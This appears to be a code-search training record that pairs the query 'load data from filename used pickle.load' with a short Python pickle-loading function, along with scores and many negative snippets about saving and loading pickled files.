[ "0.64461994", "0.61870736", "0.6155342", "0.606294", "0.60158396", "0.59407747", "0.5909308", "0.5869749", "0.5851598", "0.58354104", "0.5772434", "0.5748269", "0.574007", "0.5675615", "0.5668143", "0.5668143", "0.5668143", "0.5668143", "0.5668143", "0.5668143", "0.5668143", "0.5668143", "0.5668143", "0.5668143", "0.5668143", "0.56668574", "0.56544757", "0.5642185", "0.56349945", "0.55991596", "0.55842316", "0.55806315", "0.55688715", "0.5526911", "0.5517144", "0.5492399", "0.54842997", "0.546942", "0.5462072", "0.5458034", "0.5420423", "0.54133695", "0.5409734", "0.54094636", "0.5401592", "0.5399459", "0.53950405", "0.5389266", "0.5385976", "0.5376283", "0.53623945", "0.5362315", "0.5360602", "0.5360602", "0.53574705", "0.53508556", "0.53494215", "0.5349183", "0.5340616", "0.5337646", "0.5336186", "0.5336186", "0.53294474", "0.5324071", "0.5316508", "0.53143376", "0.5308128", "0.53059644", "0.5304992", "0.52990156", "0.52943707", "0.5290482", "0.52880156", "0.5286479", "0.52804244", "0.5278929", "0.52674896", "0.5266074", "0.5262645", "0.52546716", "0.5253695", "0.5252237", "0.52518606", "0.5242113", "0.5238136", "0.5237907", "0.52341616", "0.523326", "0.52307504", "0.5229827", "0.52198815", "0.52198815", "0.52158785", "0.5211892", "0.52094036", "0.520762", "0.5205642", "0.52001923", "0.5198957", "0.5194029" ]
0.65774465
0
store input into filename used pickle.dump
def store (input, filename) : cout = open (filename, 'w') pickle.dump (input, cout) cout.close ()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def store(self, filename):", "def pickle(self,data,filename):\n pickle.dump(data, open(filename, 'wb'))", "def save_file_data(name, obj, input_path='/inputs'):\n filename = '{}/{}.pkl'.format(input_path, name)\n if not os.path.exists(os.path.dirname(filename)):\n try:\n os.makedirs(os.path.dirname(filename))\n except OSError as exc: # Guard against race condition\n if exc.errno != errno.EEXIST:\n raise\n with open(filename.format(name), 'wb+') as output:\n pickle.dump(obj, output)", "def save(self, output, data):", "def save(data, filename):\r\n with open(filename, 'wb') as fp:\r\n pickle.dump(data, fp)", "def save(self,filename): \n with open(filename, 'wb') as f:\n pickle.dump(self,f)", "def save(self,filename):\n with open(filename,'wb') as f:\n pickle.dump(self,f)", "def save(self, filename):\n pickle.dump(self, open(filename + '.p', 'wb'), 2)", "def store_pickle(fname, info, mode='w'):\n assert fname[-2:] == '.p'\n f = open(fname, mode)\n pickle.dump(info, f)\n f.close()", "def psave(var, filename):\n pickle.dump(var, open(filename, 'wb'))", "def save_object(self, filename, data):\n with open(filename, 'wb') as outp: # Overwrites any existing file.\n pickle.dump(data, outp, pickle.HIGHEST_PROTOCOL)", "def save_as(self, filename):\n assert type(filename) == str, 'ERROR: filename should be type str'\n if '.pkl' in filename:\n with open(filename, 'wb') as f:\n dill.dump(self, f)\n else:\n with open(filename + '.pkl', 'wb') as f:\n dill.dump(self, f)", "def save(fname, data):\r\n with open(fname, 'wb') as f:\r\n pickle.dump(data, f)", "def save(self, filename):\n if '.pkl' not in filename:\n filename = filename + '.pkl'\n with open(filename, 'wb') as f:\n pickle.dump(self, f)", "def save_input(self):\n if not os.path.exists(self.wdir):\n os.makedirs(self.wdir)\n\n with open(self.filepath, \"w\") as f:\n f.write(self.input_string)\n print(f\"-- Input file [{self.filename}] written successfully.\")", "def save_var(filename, data, protocol = -1, allow_dill=False):\n if filename.endswith('.gz') :\n open_method = gzip.open\n else:\n open_method = open\n\n output = open_method(filename, 'wb')\n try:\n # Pickle dictionary using given protocol\n std_pickle.dump(data, output, protocol)\n finally:\n output.close()\n\n return", "def save(self, filename):\n with open(filename, \"wb\") as f:\n pkl.dump(self, f)", "def pickle_data(file_name, data):\n outfile = open(file_name, \"wb\")\n pickle.dump(data, outfile)\n outfile.close()", "def save(self, filename, **kwargs):\n with open(filename, 'wb') as fin:\n pickle.dump(self, fin, **kwargs)", "def save(self,filename):\n f = open(filename, 'wb')\n pickle.dump(self,f)\n f.close()", "def save_pickle(file, path):\n with open(path, 'wb') as f:\n pickle.dump(file, f)\n file_name = re.findall(r\"/?[^/]+\", path)[-1].strip(\"/\")\n print(f\"Stored {file_name}.\")", "def write_pickle_object_to_file(self, inpobj):\n with gzip.open('%s.tmp' % self.pickle_file, 'wb') as pkl_file:\n pickle.dump(inpobj, pkl_file, pickle.HIGHEST_PROTOCOL)\n run_command('mv %s.tmp %s' % (self.pickle_file, self.pickle_file))\n return True", "def save_pickle(filename, data, override=True):\n filename = \"{}.pkl\".format(filename)\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n\n if override == False:\n filename = add_unique_postfix(filename)\n\n with open(filename, \"wb\") as f:\n pickle.dump(data, f)\n\n return filename", "def save(self,fn):\n fn = fn if fn[-4:] == \".pkl\" else fn+\".pkl\"\n with open(fn,\"wb+\") as f:\n pickle.dump(self,f)\n log(\"Saved reader to {}\".format(fn))", "def save(object, filename, protocol = 0):\n file = gzip.GzipFile(filename, 'wb')\n file.write(pickle.dumps(object, protocol))\n file.close()", "def pickleSave(object, filename):\n #Todo: Handle exceptions from pickle\n filehandler = open(\"obj/\" + filename + \".obj\", 'wb')\n pickle.dump(object, filehandler)", "def save(self, filename):\n cPickle.dump(self, open(filename, \"wb\"))", "def pickle_data(filename, data):\n f = open(filename, \"wb\")\n pickle.dump(data, f, pickle.HIGHEST_PROTOCOL)\n f.close()", "def save(self, file_name):\n saved_data = { \"start_config\" : self.start_config, \"action_storage\" : self.action_storage } \n with open(file_name, 'wb') as fh:\n pickle.dump(saved_data, fh)", "def saveVar(var,name):\n with open(name+'.pickle','wb') as fl:\n pickle.dump(var,fl)", "def saveStuff(stuff, path=None):\n if path == None:\n # TODO take name from something\n output = open('results/i-will-be-overwritten.pkl', 'wb')\n else:\n output = open(path, 'wb')\n\n # Pickle the list using the highest protocol available.\n cPickle.dump(stuff, output, -1)\n output.close()", "def saveStuff(stuff, path=None):\n if path == None:\n # TODO take name from something\n output = open('results/i-will-be-overwritten.pkl', 'wb')\n else:\n output = open(path, 'wb')\n\n # Pickle the list using the highest protocol available.\n cPickle.dump(stuff, output, -1)\n output.close()", "def save(self, filename='test'):\n file = open(filename+'.txt','w')\n pickle.dump(self, file)\n file.close()", "def save_pickle(obj, filename):\n with open(filename, 'wb') as file:\n pickle.dump(obj, file)", "def save(self, output, data):\n pass", "def save_data(data: Any, file_name: str) -> None:\n with open(file_name, \"wb\") as output:\n pickle.dump(data, output)", "def do_pickle(self, arg):\n try:\n from pickling import Pickling\n Pickling(arg, input(\"Please enter the name of file: \")).pickle_it()\n except TypeError as e:\n print(e)\n except():\n print(\"Error!!\")", "def save(self, filename):\n with open(filename, 'wb') as f:\n pickle.dump({'wi': self.W_input_to_hidden, 'wo': self.W_hidden_to_output}, f)", "def save_data_pickle(PATH, data, dataset, filename):\n with open(PATH + '/' + dataset + \"_\" + filename + \".pkl\",\"wb\") as f:\n pickle.dump(data,f)\n print(filename, \"created\")", "def storePickle(filename, fit_diff_matrix):\n store_filename = filename + \".pickle\"\n with open(store_filename, \"wb\") as f:\n pickle.dump(fit_diff_matrix, f)", "def write_to_file(name, obj):\n\n print 'writing structures to pickle'\n print '----------------------------'\n\n path = os.getcwd() + '/pickles/' + name + '.pkl'\n file = open(path, 'wb')\n pickle.dump(obj, file)\n file.close()", "def save(self):\n pickle.dump(self, open(self.path, \"wb\"))", "def save(self, filename):\n with gzip.open(filename, \"w\") as f:\n f.write(pickle.dumps(self))", "def save(self, filename):\n Util.savePickle(self.V, filename + self.ext, overwrite=True)\n return filename + self.ext", "def save(self, filename):\n pass", "def save_to_disk(name, object):\n shortname = _dumpify(_compress_name(name) + '.pkl')\n print 'save_to_disk(%s)' % shortname\n pkl_file = open(shortname , 'wb')\n pickle.dump(object, pkl_file, -1) # Pickle the list using the highest protocol available.\n pkl_file.close()", "def save_pickle(file, variable):\n if file.split('.')[-1] != \"pkl\":\n file += \".pkl\"\n\n with open(file, 'wb') as f:\n pickle.dump(variable, f)\n print(\"Variable successfully saved in \" + file)", "def to_pickle(self, filename, **kwargs):\n with open(filename, 'wb') as f:\n pickle.dump(self, f)", "def pickle_dump(file_name: str, data: Any):\n with open(file_name, 'wb') as file:\n pickle.dump(data, file, protocol=pickle.HIGHEST_PROTOCOL)", "def save(self, fname):\n pass", "def save_as(self, filename: str) -> None:\n save_data = lzma.compress(pickle.dumps(self))\n with open(filename, \"wb\") as f:\n f.write(save_data)", "def _save_obj(obj, name):\n with open('/bigdisk/pickles/' + name, 'w') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)", "def save(data, phonebook):\n\n with open(phonebook, \"w\") as outfile:\n cPickle.dump(data, outfile)", "def savePickle(object, name):\n epoch = time.time()\n filename = name + str(epoch) + \".pkl\" # Save name\n fullPath = path.join(PICKLE_DIR, filename) # Save path\n\n # Get permissions and save the file\n with open(fullPath, \"w\") as outfile:\n pickle.dump(object, outfile)", "def save(object, filename, protocol = 0):\n file = gzip.GzipFile(filename, 'wb')\n file.write(pickle.dumps(object, protocol))\n file.close()", "def save(self, fname):\n with open(fname, \"wb\") as f:\n cloudpickle.dump(self, f)\n # pickle.dump(self, open(fname, 'wb'))", "def _save(self):\n # TODO: Use local.punny dump (when written)\n with open(filename, 'w') as f:\n pickle = Pickler(f)\n pickle.dump(self.pungen.puns)", "def save(self, filename = 'array_zest', path = '/home/eric/dev/insitu/data/zs_recovery/'):\n filename = filename# + '_Lx_' + str(self.Lx) + 'm_Ly_' + str(self.Ly) + 'm'\n self.path_filename = path + filename + '.pkl'\n f = open(self.path_filename, 'wb')\n pickle.dump(self.__dict__, f, 2)\n f.close()", "def save(self, target):\n from six.moves.cPickle import dump\n data = self.serialize()\n with open(target, 'wb') as f:\n dump(data, f)", "def save(self, target):\n from six.moves.cPickle import dump\n data = self.serialize()\n with open(target, 'wb') as f:\n dump(data, f)", "def dump_pickle_data(obj, filename):\n path = \"../tmp/{}.pckl\".format(filename)\n f = open(path, 'wb')\n pickle.dump(obj, f)\n f.close()", "def save(self, p):\n pickle.dump(p, open('save.dat', 'wb'))\n print(\"Game Saved!\")", "def save_model(self, step):\n\n # file_name = params['name']\n # pickle.dump(self, gzip.open(file_name, 'wb'))", "def writePickle(self, filename):\n \n assert filename.endswith('.pkl')\n file = open(filename, 'wb')\n cPickle.dump(self, file, cPickle.HIGHEST_PROTOCOL)", "def save_pkl(dictionnary,directory,file_name):\n with open(f'saved_exp_info/{directory}/{file_name}.pkl', 'wb') as output:\n pickle.dump(dictionnary, output)", "def save_file(self, file_name: str):\n pickle.dump(self, open(file_name, \"wb\"))", "def save_dict_pickle(PATH, data, filename):\n with open(PATH + '/' + filename + \".pkl\",\"wb\") as f:\n pickle.dump(data,f)\n print(filename, \"created\")", "def save(self, file_name: str) -> None:\n with open(file_name, \"wb\") as f:\n pickle.dump(self, f)", "def save(self, filename):\n pass", "def save(self):\n if self.hasChanged:\n filePath = self.path\n tempPath = filePath+'.tmp'\n fileDir = os.path.split(filePath)[0]\n if not os.path.exists(fileDir): os.makedirs(fileDir)\n cPickle.dump(self.data,open(tempPath,'w'))\n renameFile(tempPath,filePath,True)\n self.hasChanged = False", "def save(self, filename):\n with open(filename, 'wb') as f:\n pickle.dump({'wi': self.W_input_to_hidden, 'wh':\n self.W_hidden_to_hidden, 'wo': self.W_hidden_to_output}, f)", "def pickleToDisk(population, fName):\n pickle.dump(population, open(fName + \".pkl\", 'wb'), protocol=2)", "def write_pickle(obj, file_name):\n with open(file_name, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)", "def pickle_files(filename, stuff):\n save_stuff = open(filename, \"wb\")\n pickle.dump(stuff, save_stuff)\n save_stuff.close()", "def save_reaction(self, filename):\n filename = filename.replace('.pkl', '.gpkl')\n filename = filename.replace('.bpkl', '.gpkl')\n # Overwrites any existing file.\n with gzip.GzipFile(filename, 'wb') as output:\n pickle.dump(self, output, pickle.HIGHEST_PROTOCOL)", "def store_outcome(model_name, dataset, strict, forgiving):\n model_name = model_name.replace('/', '-')\n\n with open(f'outcomes-{model_name}-{dataset}.pkl', 'wb') as file:\n\n pickle.dump((strict, forgiving), file)", "def save(self, target, withdP=False):\n from six.moves.cPickle import dump\n data = self.serialize(withdP=withdP)\n with open(target, 'wb') as f:\n dump(data, f)", "def save(self, target, withdP=False):\n from six.moves.cPickle import dump\n data = self.serialize(withdP=withdP)\n with open(target, 'wb') as f:\n dump(data, f)", "def pickle_dump(data, file):\n with open(file, 'wb') as f:\n pickle.dump(data, f, pickle.HIGHEST_PROTOCOL)", "def serialize(self): \n with open(self.path+self.name, \"wb\") as pfile:\n pickle.dump(self.pyObj, pfile)", "def save_object(obj, filename):\r\n with open(filename, 'wb') as output:\r\n pickle.dump(obj, output)", "def save(self, filename=\"fitter.pickle\"):\n\n with open(filename, \"wb\") as outfile:\n pickle.dump(self, outfile)", "def save_obj(obj, name):\n \n with open(name + '.pkl', 'wb') as objec:\n pickle.dump(obj, objec)", "def storeData(data, filename='laue.dat'):\r\n import cPickle\r\n with open(filename, 'wb') as fp:\r\n cPickle.dump(data, fp)", "def save_object(obj, filename):\n with open(filename, 'wb') as output_file: # Overwrites any existing file.\n pickle.dump(obj, output_file, pickle.HIGHEST_PROTOCOL)", "def save(self, filename):\n import pickle\n if path.dirname(filename) and not path.exists(path.dirname(filename)):\n makedirs(path.dirname(filename))\n pickle.dump(self, open(filename, 'wb'), protocol=-1)", "def save_obj(obj, name):\r\n with open('../pickle/' + name + '.pkl', 'wb') as fout:\r\n pickle.dump(obj, fout, pickle.HIGHEST_PROTOCOL)\r\n # end with\r", "def save(self, filename):\n raise NotImplementedError", "def save_object(obj, filename):\n with open(filename, 'wb') as output:\n pickle.dump(obj, output, protocol=2)", "def _save(self):\n\t\t\n\t\tdirectory = self.Output_path\n\n\t\t# replace with \n\t\t# file_name = hermes.mk_themis_file_name(themis_obj = self)\n\t\tfile_name = f'Themis_{self.CELL_ID[\"experiment\"]}_u{self.CELL_ID[\"unit\"]}_c{self.CELL_ID[\"cell\"]}_r{self.CELL_ID[\"run\"]}.pkl'\n\n\t\tsave_path = directory / file_name\n\n\t\t# Atomic saving (helpful?)\n\t\ttemp_path = save_path.with_suffix(save_path.suffix + '.tmp')\n\t\t\n\t\tself.SavePath = save_path\n\n\t\t\n\t\twith open(temp_path, 'wb') as f:\n\t\t\tpickle.dump(self, f)\n\n\t\ttemp_path.rename(save_path)\n\n\t\tprint(f'Saved {self.RUN_KEY} as {save_path}')", "def save_obj(obj, saved_name ):\n with open( saved_name + '.pkl', 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)", "def dump(self, filename):\n\n pickle.dump(self, open(filename, \"w\"))", "def dump(filename, data):\n _savez(filename, [], data, True, allow_pickle=False)", "def save_obj(obj, name):\n with open('../../data/' + name + '.pkl', 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)", "def save_obj(obj, name):\n with open('../../data/' + name + '.pkl', 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)", "def save(obj, filename):\n import pickle\n with open(filename, 'w') as f:\n pickle.dump(obj, f, protocol=pickle.HIGHEST_PROTOCOL)", "def _persist_output(self, output, dir):\r\n try:\r\n mkdirp(dir)\r\n filename = os.path.join(dir, 'output.pkl')\r\n numpy_pickle.dump(output, filename, compress=self.compress)\r\n if self._verbose > 10:\r\n print('Persisting in %s' % dir)\r\n except OSError:\r\n \" Race condition in the creation of the directory \"", "def save(self, output, data):\n return", "def dump_pickle(path, data):\n with open(path, 'wb') as f:\n pickle.dump(data, f)", "def dumpme(self) :\n fileName = \"./data/oP4_ModelBuilder.dump\"\n with open(fileName,\"wb\") as dumpedFile:\n oPickler = pickle.Pickler(dumpedFile)\n oPickler.dump(self)" ]
[ "0.7272676", "0.7110179", "0.69229895", "0.67838925", "0.6766273", "0.67407393", "0.67352134", "0.6724542", "0.6718559", "0.6689364", "0.6684626", "0.6666956", "0.6617081", "0.6609867", "0.65701944", "0.65609634", "0.6513856", "0.6507621", "0.6492011", "0.64900124", "0.64834404", "0.64727414", "0.6456504", "0.6442476", "0.64262193", "0.64228386", "0.64211506", "0.64107746", "0.64028895", "0.6402235", "0.63937235", "0.63937235", "0.6384215", "0.63796264", "0.6378364", "0.6376644", "0.6369711", "0.63530374", "0.6351733", "0.63476294", "0.6340528", "0.6337898", "0.63343847", "0.6326211", "0.63173413", "0.63059753", "0.62885976", "0.6288581", "0.62729096", "0.62699234", "0.6269645", "0.6259444", "0.62581676", "0.6255301", "0.6248481", "0.6248042", "0.6243043", "0.6241996", "0.6238635", "0.6238635", "0.6230651", "0.6229042", "0.62276435", "0.62270343", "0.6226636", "0.62244284", "0.6220412", "0.6210598", "0.61994743", "0.61941606", "0.6191943", "0.6186726", "0.61837274", "0.61836463", "0.6182321", "0.61723036", "0.61711997", "0.61711997", "0.61711544", "0.6168584", "0.6165256", "0.6159613", "0.6159405", "0.61570436", "0.61480653", "0.6146384", "0.6135245", "0.6134986", "0.61346185", "0.6132699", "0.6130812", "0.61272156", "0.61208236", "0.61208093", "0.61208093", "0.6107578", "0.61074096", "0.61065066", "0.61061394", "0.6106117" ]
0.89019084
0
load data from filename used pickle.load
def grab (filename) : cin = open (filename, 'r') return pickle.load (cin)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def load(filename):\n with open(filename,'rb') as f:\n return pickle.load(self,f)", "def load_data(file_name):\n with open(file_name, 'rb') as f:\n data = pickle.load(f)\n return data", "def load_pickle_data(filename):\n path = \"../tmp/{}.pckl\".format(filename)\n if os.path.exists(path):\n print(\"LOADING PCKL FILE FROM {}\".format(path))\n f = open(path, 'rb')\n obj = pickle.load(f)\n f.close()\n return obj", "def load(filename):\n with open(filename, 'rb') as f:\n return pickle.load(f)", "def load(filename):\n import pickle\n return pickle.load(open(filename, 'r'))", "def load(fname):\r\n with open(fname, 'rb') as f:\r\n data = pickle.load(f)\r\n return data", "def load_file(self, filename):\n with open(filename, \"rb\") as pickle_handle:\n return pickle.load(pickle_handle)", "def load_data_loader_from_file(cls, filename):\n print(\"Loading data loader from file: {}\".format(filename))\n\n with open(filename, \"rb\") as file:\n return pickle.load(file)", "def load_object(self, filename):\n with open(filename, 'rb') as inp: # Overwrites any existing file.\n data = pickle.load(inp)\n return data", "def _unpickle(filename):\n\n # Create full path for the file.\n file_path = _get_file_path(filename)\n\n print(\"Loading data: \" + file_path)\n\n with open(file_path, mode='rb') as file:\n # In Python 3.X it is important to set the encoding,\n # otherwise an exception is raised here.\n data = pickle.load(file, encoding='bytes')\n\n return data", "def pload(filename):\n return pickle.load(open(filename, 'rb'))", "def _load_file(name):\n filename = 'ind.{}.{}'.format(dataset_name, name)\n filename = os.path.join(path, filename)\n with open(filename, 'rb') as f:\n if sys.version_info > (3, 0):\n return pickle.load(f, encoding='latin1') # pylint: disable=unexpected-keyword-arg\n else:\n return pickle.load(f)", "def load_data():\n with open('data.pickle', 'rb') as f:\n data = pickle.load(f)\n return data", "def load(filename):\n try:\n with open(filename, 'rb') as f:\n data = pickle.load(f)\n return data\n except FileNotFoundError:\n return None", "def load(self, filename):\n import pickle\n return pickle.load(open(filename, 'rb'))", "def __init__(self, name, loadfile=None, loadpath=''):\n \n self.name = name\n \n if loadfile==None:\n self.data = []\n else:\n with open(loadpath+loadfile) as currentfile:\n self.data = pickle.load(currentfile)", "def load_data_pickle(PATH, dataset, filename):\n with open(PATH + '/' + dataset + \"_\" + filename + \".pkl\",\"rb\") as f:\n new_data = pickle.load(f)\n\n # print(filename, \"opened\")\n return new_data", "def load_data(file_name: str) -> Optional[Any]:\n with open(file_name, \"rb\") as input_data:\n data = pickle.load(input_data)\n return data", "def load_data(filename) :\r\n data = Data()\r\n data.load(filename)\r\n return data", "def load(self, filename):\n raise NotImplementedError", "def load(cls, filename):\n return cPickle.load(open(filename, \"rb\"))", "def load(self, filename):\n pass", "def Load_Data(savedfilename):\n import pickle\n\n try:\n\n with open(savedfilename, 'rb') as handle:\n loaded_data = pickle.load(handle)\n print\n 'loaded successfully, fileloaded as as:\\nloaded_data'\n return loaded_data\n except:\n import numpy as np\n loaded_data = np.load(savedfilename)\n return loaded_data", "def pickle_load(file_name: str) -> Any:\n with open(file_name, 'rb') as file:\n return pickle.load(file)", "def load(self):\n logger.debug('Loading state from file %s', self.file_path)\n\n with open(self.file_path, 'rb') as f:\n self.data = pickle.load(f)", "def load (self, filename) :\n\t\tserialFile = open (filename, \"rb\")\n\t\tself.production_rules = pickle.load (serialFile)\n\t\tself.unitrelation = pickle.load (serialFile)\n\t\tself.labels = pickle.load (serialFile)\n\t\tself.keeper = pickle.load (serialFile)\n\t\tself.strnodes = pickle.load(serialFile)\n\t\tself.tokens = pickle.load (serialFile)\n\t\tserialFile.close()", "def pickle_from_file(fname):\n\ttry:\n\t\tfh = open(fname, 'r')\n\t\tdata = cPickle.load(fh)\n\t\tfh.close()\n\texcept:\n\t\t#raise\n\t\tprint \"Loading pickled data failed!\", sys.exc_info()[0]\n\t\tdata = None\n \n\treturn data", "def pickleLoad(filename):\n #Todo: Handle exceptions from pickle\n filehandler = open(\"obj/\" + filename + \".obj\", 'rb')\n object = pickle.load(filehandler)\n return object", "def load_pkl_data(path):\n with open(path, 'rb') as fi:\n data = pickle.load(fi)\n return data", "def load(self, filename):\n with open(filename, 'r') as f:\n self.components, self.mean = pickle.load(f)", "def load_pickle(path):\n with open(path, 'rb') as f:\n data = pickle.load(f)\n return data", "def load_obj(name):\n with open('../../data/' + name + '.pkl', 'rb') as f:\n return pickle.load(f)", "def load_obj(name):\n with open('../../data/' + name + '.pkl', 'rb') as f:\n return pickle.load(f)", "def load_pickle(filename):\n with open(filename, 'rb') as file:\n obj = pickle.load(file)\n return obj", "def load(cls,filename):\n obj = None\n f = open(filename,'r')\n try:\n obj = pickle.load(f)\n obj.filename = filename\n finally:\n f.close()\n return obj", "def load_pickle(filename):\n\n with open(filename, 'rb') as file:\n if filename.split('.')[-1] == 'dill':\n obj = dill.load(file)\n else:\n obj = pickle.load(file)\n return obj", "def load_pickle(filename):\n with open(filename, \"rb\") as f:\n obj = pickle.load(f)\n\n return obj", "def load_files(filename):\n saved_stuff = open(filename, \"rb\")\n stuff = pickle.load(saved_stuff)\n saved_stuff.close()\n return stuff", "def load(self, filename = 'array_zest', path = '/home/eric/dev/insitu/data/zs_recovery/'):\n lpath_filename = path + filename + '.pkl'\n f = open(lpath_filename, 'rb')\n tmp_dict = pickle.load(f)\n f.close()\n self.__dict__.update(tmp_dict)", "def load_from_file(self, name):\n if os.path.isdir(\"saved_data\"):\n with open(f'saved_data/{name}.txt', 'rb') as file:\n data = pickle.load(file)\n print(\"Successfully load from file\")\n return data\n else:\n os.mkdir(\"saved_data\")\n self.load_from_file(name)", "def load_pkl(file_name):\n with open(file_name) as fp:\n data = pkl.load(fp)\n return data", "def load(self, filename=None, data=None):\n if filename is not None and data is None:\n with open(filename, 'rb') as fd:\n data = pickle.load(fd)\n elif filename is None and data is not None:\n pass\n else:\n raise ValueError(\"Exactly one of filename and data must be specified\")\n\n return self._load(data)", "def loadVar(name):\n with open(name+'.pickle','rb') as fl:\n return pickle.load(fl)", "def loadObj(name):\n\n with open(name + '.pkl', 'rb') as f:\n return pickle.load(f)", "def loadPickle(pickle_file):\n print(\"Loading pickle data from file: \"+pickle_file)\n\n data = None\n try:\n with open(pickle_file, \"rb\") as fd:\n data = pickle.load(fd)\n except EOFError:\n pass\n except pickle.UnpicklingError as upe:\n print(\"Failed: Loading Pickle Data\")\n except IOError:\n data = {}\n\n return data", "def inputfile(fileName):\n with open(fileName, \"rb\") as file:\n data = pickle.load(file)\n return data", "def load_pickle(file_name):\n with open(file_name, \"rb\") as handle:\n pickle_file = pickle.load(handle)\n\n return pickle_file", "def restoreData(filename='laue.dat'):\r\n import cPickle\r\n with open(filename, 'rb') as fp:\r\n return cPickle.load(fp)", "def pickle_load(path):\n data = pickle.load(open(os.path.join(os.getcwd(), path), 'rb'))\n return data", "def load(self,filename=None): # return True\r\n pass", "def load_data(self) -> None:", "def load(file_path):\n\t# assert type(file_path) == str, 'File_path must be a string'\n\t\n\twith open(file_path, 'rb') as f:\n\t\treturn pickle.load(f)", "def load(self):\r\n self.read(self.filename)", "def load_pickle(file):\n with open(file, 'rb') as fh:\n datum = pickle.load(fh)\n\n return datum", "def read_data(self, workfile='workfile_tmp.p'):\n self.data = pickle.load(open(workfile, 'rb'))", "def read_data(self, workfile='workfile_tmp.p'):\n self.data = pickle.load(open(workfile, 'rb'))", "def parse_pickle(filename):\n \n with open(filename) as file:\n return pickle.load(file)", "def load_obj(name):\r\n with open('../pickle/' + name + '.pkl', 'rb') as fout:\r\n return pickle.load(fout)\r\n # end with\r", "def read_from_file(name):\n print 'reading structures from pickle'\n print '------------------------------'\n\n path = os.getcwd() + '/pickles/' + name + '.pkl'\n file = open(path, 'rb')\n new_obj = pickle.load(file)\n file.close()\n\n return new_obj", "def unpickle(filename: str) -> dict:\n with open(os.path.join(f\"{ROOT_DIR}/dataset/\", filename), \"rb\") as file:\n dict = pickle.load(file, encoding=\"bytes\")\n return dict", "def load(cls, filename):\n \n raise NotImplementedError(\"not implemented!\")", "def _load_data(self, filename):\n if not os.path.isfile(filename):\n return False\n\n with open(filename) as f:\n data = pickle.load(f)\n if data:\n self.profiles = data['profiles']\n self.user_data = data['user_data']\n self.api_data = data['api_data']\n else:\n return False", "def pickle_loader(fileobj):\n if isinstance(fileobj, bytes):\n data = pickle.loads(fileobj, encoding=\"latin1\")\n elif isinstance(fileobj, six.string_types):\n with open(fileobj, 'rb') as f:\n data = pickle.load(f, encoding=\"latin1\")\n elif hasattr(fileobj, 'read'):\n data = pickle.load(fileobj, encoding=\"latin1\")\n else:\n raise ValueError('fileobj is not a filename or a file object')\n return data", "def load_synthetic_data():\n\n pickle_object = FM().data_file \n\n with pickle_object.open('rb') as data_file: \n return pickle.load(data_file)", "def _load_obj(name):\n with open('/bigdisk/pickles/' + name, 'r') as f:\n return pickle.load(f)", "def load(self, which):\n\t\tpath = os.path.join(self.storagedir, which)\n\t\tprint(\"Loading from\", path)\n\t\twith open(path, \"rb\") as handle:\n\t\t\tsetattr(self, which, _pickle.load(handle))", "def safe_pickle_load(file_name):\n try:\n f = open(file_name, \"r\")\n try:\n data = pickle.load(f)\n except EOFError:\n data = None\n finally:\n f.close()\n except IOError:\n data = None\n\n return data", "def load(cls, filename, **kwargs):\n with open(filename, 'rb') as fin:\n self = pickle.load(fin, **kwargs)\n self._check_types()\n return self", "def load_data(filename):\r\n with open(filename,'rb') as f:\r\n data = pk.load(f,encoding='bytes')\r\n return data[b'data'],data[b'labels']", "def load_from_file(self, filename):\n # clear datastore mape\n self._datastoreMap = {}\n # citanje filea\n with open(filename, 'rb') as f:\n binstr = f.read()\n inMap = pickle.loads(binstr)\n # za svaki kanal moramo dodati element u _datastoreMap\n for kanal in inMap:\n # stvaramo instancu Datastore\n self._datastoreMap[kanal] = DataStore()\n # instanca Datastore zna se otpakirati iz mape (dictionary)\n self._datastoreMap[kanal].dict2store(inMap[kanal])", "def _load_binary(file_name):\n try:\n with open(file_name, 'rb') as f:\n return cp.load(f)\n except UnicodeDecodeError: # When loading Python 2 pickle from Python 3\n with open(file_name, 'rb') as f:\n return cp.load(f, encoding=\"latin1\")", "def load(self, filename):\n f = open(filename, 'rb')\n try:\n data = pickle.load(f)\n activities, schedules, resources, resourceAsignaments = data\n except (pickle.UnpicklingError, AttributeError, EOFError, ImportError, IndexError, ValueError, KeyError):\n raise InvalidFileFormatException('Unpickle failed')\n\n # Check activities, schedules, resources, resourceAsignaments have the right data structure\n for row in activities:\n if len(row) != 9:\n raise InvalidFileFormatException('Incorrect data on file')\n \n f.close()\n return data", "def load(self, filename):\n with open(filename, 'rb') as f:\n data = pickle.load(f)\n # Set biases and weights\n self.W_input_to_hidden = data['wi']\n self.W_hidden_to_output = data['wo']", "def load_pickle(path):\n with open(path, 'rb') as handle:\n return pickle.load(handle)", "def read_pickle(file_name):\n with open(file_name, 'rb') as f:\n obj = pickle.load(f)\n return obj", "def loads(data):\n return cPickle.loads(data)", "def load(cls, file_id):\n if not isinstance(file_id, file):\n handle = open(\n \"{:s}{:s}-{:d}.pckl\".format(\n DUMP_PATH,\n cls.__name__,\n file_id\n ),\n \"rb\")\n else:\n handle = file_id\n return pickle.load(handle)", "def load_model(self, file_name):\n with open(file_name, 'rb') as file:\n self.lin_reg = pickle.load(file)", "def loadData(dataPathFile):\r\n if dataPathFile[-3:] == 'pkl':\r\n dataBaseDict = pickle.load(open(dataPathFile, 'rb'))\r\n return dataBaseDict\r\n else:\r\n raise Exception('File that is trying to be loaded is not a pickle file\\n')", "def load_data():\r\n print ('Loadng all the file one time......')\r\n if not os.path.exists('cifar.pkl'):\r\n set_data()\r\n with open('cifar.pkl', 'rb') as cifar_pickle:\r\n data = six.moves.cPickle.load(cifar_pickle)\r\n return data", "def readDataFromPickle(config, filename):\n path = config.picklePath + filename\n\n # if stopid in pickle variable and it is a dataframe-> sort columns\n return pd.read_pickle(path)", "def pickle_load(path):\n try:\n data = pickle.load(open(path, \"rb\"))\n return data\n except UnpicklingError:\n unix_path = path.replace(\".pkl\", \"_unix.pkl\")\n try:\n data = pickle.load(open(unix_path, \"rb\"))\n return data\n except FileNotFoundError:\n path = _to_unix(path)\n data = pickle.load(open(path, \"rb\"))\n return data", "def load_data(self):", "def unpickle_data(file_name):\n infile = open(file_name, \"rb\")\n try:\n data = pickle.load(infile)\n except:\n data = {}\n infile.close()\n\n return data", "def 